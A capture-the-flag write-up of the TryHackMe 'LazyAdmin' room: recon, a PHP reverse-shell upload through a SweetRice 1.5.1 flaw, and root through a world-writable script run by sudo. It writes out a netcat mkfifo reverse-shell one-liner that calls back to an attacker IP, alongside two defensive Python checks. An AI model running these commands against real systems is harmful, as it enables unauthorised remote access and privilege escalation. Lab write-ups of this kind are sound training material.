https://tryhackme.com/room/lazyadmin

💭 Thoughts after doing the room

I didn’t explore all attack vectors in this room. On the TryHackMe page, the only information given was “Have some fun! There might be multiple ways to get user access.” I think I used the most common method.

The Sweet-Rice CMS was quite exotic, so when I googled it, I found more TryHackMe write-ups than CMS documentation to get the default password. As for the root part, I enjoyed the challenge of having to discover that www-data had access to another home directory.

Overall, it was pretty straightforward, but not very exciting. I think it would have been more enjoyable if I hadn’t googled for exploits of that version. Then, I would have had to find my own way into the machine.

Task 1: Lazy Admin

What is the user flag?

No hints or other text are provided, so I try a default nmap scan first.

root@ip-10-10-123-222:~# IP=10.10.42.146
root@ip-10-10-123-222:~# nmap -T4 $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2023-04-02 20:41 BST
Nmap scan report for ip-10-10-42-146.eu-west-1.compute.internal (10.10.42.146)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:DF:1D:DF:D1:75 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

Checking the web page, it's just the default Apache site. Next, more nmap information gathering with version and script detection on port 80:

root@ip-10-10-123-222:~# nmap -p80 -sV -sC $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2023-04-02 20:43 BST
Nmap scan report for ip-10-10-42-146.eu-west-1.compute.internal (10.10.42.146)
Host is up (0.00019s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:DF:1D:DF:D1:75 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds

Brute-forcing directories on the HTTP server with a common wordlist to see if there is anything else:

root@ip-10-10-123-222:~# gobuster dir --url $IP -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.42.146
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2023/04/02 20:46:29 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/.hta (Status: 403)
/content (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2023/04/02 20:46:33 Finished
===============================================================

/content looks interesting. It shows this page:

The page is powered by SweetRice and looks like it has just been set up. So I'll google for the default credentials and the path to the admin interface first.

Google shows the password as a text snippet before I visit any page. Almost all search results are TryHackMe write-ups ^^ so I don't click on one, to avoid spoilers.

I can log in successfully with the credentials. I see that it is version 1.5.1.

First I enable the site as described on the landing page I saw, to check if it renders. I could try to find a way to upload a file manually now. But I first try googling “SweetRice exploit 1.5.1”; the first entry was SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution, which says that it's possible to upload a file in the Ads section. So I upload the popular PHP reverse shell from PentestMonkey. The Exploit-DB entry also tells the location of the uploaded script.
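From the defender's side, the tell-tale of this step is a request for a PHP file inside a directory that should only hold static ad uploads. The following is an added example, not part of the write-up or of SweetRice: it parses Apache combined-log lines and flags any request that executes a script under an upload directory. The only path it knows is /content/inc/ads/ from this room; the log lines are constructed samples.

```python
"""Flag requests for server-side scripts inside a CMS upload directory.

Added example for the SweetRice upload path in this write-up; the log lines
below are constructed, not taken from the box."""
import re

# Apache combined-log prefix: client, ident, user, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Directories that should only ever hold static uploads. /content/inc/ads/
# is the SweetRice ads directory from the write-up; add others per CMS.
UPLOAD_DIRS = ("/content/inc/ads/",)
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")

# Constructed sample log: one upload-directory script hit among normal traffic.
SAMPLE_LOG = """\
10.10.123.222 - - [02/Apr/2023:23:27:10 +0300] "GET /content/ HTTP/1.1" 200 4096
10.10.123.222 - - [02/Apr/2023:23:28:30 +0300] "GET /content/inc/ads/reversephp.php HTTP/1.1" 200 0
10.10.42.200 - - [02/Apr/2023:23:29:00 +0300] "GET /content/inc/ads/banner.png HTTP/1.1" 200 2048
"""


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_script_in_upload_dir(path):
    """True when a request path names a script extension under an upload directory."""
    clean = path.split("?", 1)[0].lower()
    return clean.startswith(UPLOAD_DIRS) and clean.endswith(SCRIPT_EXT)


def flag_script_requests(log_text):
    """Return every parsed request that executes a script from an upload directory."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_script_in_upload_dir(rec["path"]):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in flag_script_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['path']} -> {hit['status']}")
```

The same rule is also the mitigation: an upload directory should never be allowed to execute scripts at all (with mod_php, `php_admin_flag engine off` in a `<Directory>` block for it), so that a hit from this check means the request returned the file's source rather than running it.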

So I start a listener with nc and open the uploaded script in the browser at http://10.10.42.146/content/inc/ads/reversephp.php:

root@ip-10-10-123-222:~# nc -nvlp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from 10.10.42.146 38976 received!
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 23:28:37 up 49 min,  0 users,  load average: 0.12, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/
$ cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
itguy:x:1000:1000:THM-Chal,,,:/home/itguy:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
guest-3myc2b:x:998:998:Guest:/tmp/guest-3myc2b:/bin/bash
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
$ find / -name user.txt 2>/dev/null 
/home/itguy/user.txt
$ cat /home/itguy/user.txt
THM{🤐}

I first checked which user I'm logged in as, then looked at the passwd file to see the users; the one with UID 1000 (itguy) is interesting. But I then decided to just search for the user flag by its commonly known filename.

The 2>/dev/null is there to suppress permission errors: they are written to /dev/null instead of to the screen.

What is the root flag?

Now I'll check sudo privileges, as usual.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

It shows that I can run perl as root, but only with the file /home/itguy/backup.pl.

This probably requires doing more with the terminal session, so I'll upgrade to a better shell. I check with which python whether python exists and then execute

python -c 'import pty;pty.spawn("/bin/bash")'

I print the perl script:

www-data@THM-Chal:/home/itguy$ cat backup.pl
cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

I check the permissions of copy.sh:

www-data@THM-Chal:/etc$ stat copy.sh
stat copy.sh
  File: 'copy.sh'
  Size: 81        	Blocks: 8          IO Block: 4096   regular file
Device: ca01h/51713d	Inode: 1050508     Links: 1
Access: (0647/-rw-r--rwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2023-04-02 23:44:27.980000000 +0300
Modify: 2019-11-29 13:45:39.542648714 +0200
Change: 2019-11-29 13:45:39.542648714 +0200
 Birth: -

I see that it is writable by anyone: the mode is 0647, so "others" have rwx on a file that root runs via sudo.
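The two checks above (what sudo allows, and whether anything on the command's path is writable by others) are exactly what a hardening audit should run before a user ever gets a shell. The following is an added example, not code from the write-up: it parses `sudo -l` output, follows absolute paths from the allowed command into each readable text file it reaches (sudo rule -> backup.pl -> copy.sh), and reports any regular file on that chain with the others-write bit set. The demo rebuilds the chain in a temporary directory with the 0647 mode seen above, so it runs anywhere; the sample sudo output is constructed from the one on this page.

```python
"""Audit `sudo -l` rules for commands that end up executing world-writable files.

Added example (not part of the write-up): it follows the chain
sudo rule -> backup.pl -> copy.sh by extracting absolute paths from each
readable text file it reaches, and reports any regular file on that chain
that others can write to. demo() builds a replica of the chain in a temp
directory, so it runs on any machine."""
import os
import re
import stat
import tempfile

# One rule line from the "may run" section: "(user) [NOPASSWD:] command args".
RULE_RE = re.compile(r"^\s*\([^)]*\)\s*(?:NOPASSWD:|PASSWD:)?\s*(.+)$")
# An absolute path token; the lookbehind stops it matching the tail of another path.
PATH_RE = re.compile(r"(?<![\w/])/[\w./-]+")


def parse_sudo_rules(text):
    """Return the command strings listed after 'may run the following commands'."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if in_rules:
            m = RULE_RE.match(line)
            if m:
                rules.append(m.group(1).strip())
    return rules


def is_world_writable(path):
    """True for a regular file whose mode has the others-write bit set."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def reachable_paths(text, max_depth=3):
    """Breadth-first walk: paths in `text`, then paths inside each readable text file."""
    seen, frontier = [], [(p, 0) for p in PATH_RE.findall(text)]
    while frontier:
        path, depth = frontier.pop(0)
        if path in seen:
            continue
        seen.append(path)
        if depth >= max_depth or not os.path.isfile(path):
            continue
        try:
            with open(path, "rb") as fh:
                body = fh.read(65536)
        except OSError:
            continue
        if b"\0" in body:          # binary (e.g. the perl interpreter): do not parse
            continue
        frontier.extend((p, depth + 1) for p in PATH_RE.findall(body.decode(errors="replace")))
    return seen


def audit(sudo_l_output):
    """Return (rule, path) pairs where the rule can reach a world-writable regular file."""
    findings = []
    for rule in parse_sudo_rules(sudo_l_output):
        for path in reachable_paths(rule):
            if is_world_writable(path):
                findings.append((rule, path))
    return findings


def demo():
    """Constructed replica of the box: backup.pl (0644) calling copy.sh (0647)."""
    tmp = tempfile.mkdtemp()
    copy_sh = os.path.join(tmp, "copy.sh")
    backup_pl = os.path.join(tmp, "backup.pl")
    with open(copy_sh, "w") as fh:
        fh.write("echo backup placeholder\n")
    os.chmod(copy_sh, 0o647)               # the mode the write-up found on /etc/copy.sh
    with open(backup_pl, "w") as fh:
        fh.write('#!/usr/bin/perl\n\nsystem("sh", "%s");\n' % copy_sh)
    os.chmod(backup_pl, 0o644)
    sudo_l = ("User www-data may run the following commands on THM-Chal:\n"
              "    (ALL) NOPASSWD: /usr/bin/perl %s\n" % backup_pl)
    return audit(sudo_l), backup_pl, copy_sh


if __name__ == "__main__":
    findings, _, _ = demo()
    for rule, path in findings:
        print(f"rule '{rule}' reaches world-writable file {path}")
```

The finding for this box would be the copy.sh entry alone: backup.pl itself is root-owned 0644, so the sudo rule looks harmless until the script it calls is inspected. Fixing it is a `chmod 0744 /etc/copy.sh` plus making sure root-run helper scripts do not live in directories other users can write to.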

www-data@THM-Chal:/etc$ cat copy.sh
cat copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

When I print the file, it conveniently already contains a reverse shell, just with the wrong IP.

So I adapt it and overwrite the current contents.

www-data@THM-Chal:/etc$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.123.222 4242 >/tmp/f" > /etc/copy.sh
<;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.123.222 4242 >/tmp/f" > /etc/copy.sh   
www-data@THM-Chal:/etc$ 

www-data@THM-Chal:/etc$ 

www-data@THM-Chal:/etc$ cat copy.sh
cat copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.123.222 4242 >/tmp/f

Then I execute the script with sudo and perl:

www-data@THM-Chal:/home/itguy$ which perl
which perl
/usr/bin/perl
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl 
sudo /usr/bin/perl /home/itguy/backup.pl
rm: cannot remove '/tmp/f': No such file or directory

It executes and I get the root shell:

# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{🤐}
#